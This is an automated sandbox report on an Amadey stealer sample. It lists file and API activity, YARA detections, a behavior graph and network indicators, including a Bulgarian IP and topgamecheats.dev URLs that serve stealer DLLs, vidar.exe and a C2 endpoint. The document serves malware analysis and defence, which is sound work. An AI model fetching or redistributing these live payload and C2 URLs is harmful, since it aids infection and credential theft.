Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000102011\build.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000102011\build.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B2A0 GetUserNameA, 0_2_0040B2A0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 28.3.Dctooux.exe.3170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.3100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.4930e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.C4v61Eu50U.exe.4950000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.48e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.C4v61Eu50U.exe.4950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.3170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.3100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.48e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.49a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.2927898895.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1841545556.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1846524053.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1649546292.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2303173826.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1748409001.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00431251
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_00431F48
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049114B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_049114B8
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049121AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_049121AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049614B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_049614B8
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049621AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_049621AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 28_2_00402340
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031321AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_031321AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031314B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_031314B8
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427158 Sample: C4v61Eu50U.exe Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 43 topgamecheats.dev 2->43 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 9 other signatures 2->59 8 C4v61Eu50U.exe 5 2->8         started        signatures3 process4 file5 33 C:\Users\user\AppData\Local\...\Dctooux.exe, PE32 8->33 dropped 61 Detected unpacking (changes PE section rights) 8->61 63 Detected unpacking (overwrites its own PE header) 8->63 65 Contains functionality to inject code into remote processes 8->65 12 Dctooux.exe 8->12         started        16 Dctooux.exe 8->16         started        19 WerFault.exe 16 8->19         started        21 9 other processes 8->21 signatures6 process7 dnsIp8 45 topgamecheats.dev 93.123.39.96, 49745, 49746, 49747 NET1-ASBG Bulgaria 12->45 35 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 12->35 dropped 37 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 12->37 dropped 39 C:\Users\user\AppData\Local\...\build.dll, PE32 12->39 dropped 41 5 other files (1 malicious) 12->41 dropped 23 WerFault.exe 12->23         started        25 WerFault.exe 12->25         started        27 WerFault.exe 12->27         started        31 3 other processes 12->31 47 Multi AV Scanner detection for dropped file 16->47 49 Detected unpacking (changes PE section rights) 16->49 51 Detected unpacking (overwrites its own PE header) 16->51 29 WerFault.exe 16->29         started        file9 signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
93.123.39.96
 topgamecheats.dev Bulgaria
43561 NET1-ASBG true

Contacted Domains

Name IP Active
topgamecheats.dev 93.123.39.96 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll true unknown
http://topgamecheats.dev/vidar.exe true unknown
http://topgamecheats.dev/j4Fvskd3/index.php?scr=1 true unknown
http://topgamecheats.dev/j4Fvskd3/index.php true unknown
http://topgamecheats.dev/build.dll true unknown
topgamecheats.dev/j4Fvskd3/index.php true low
http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll true unknown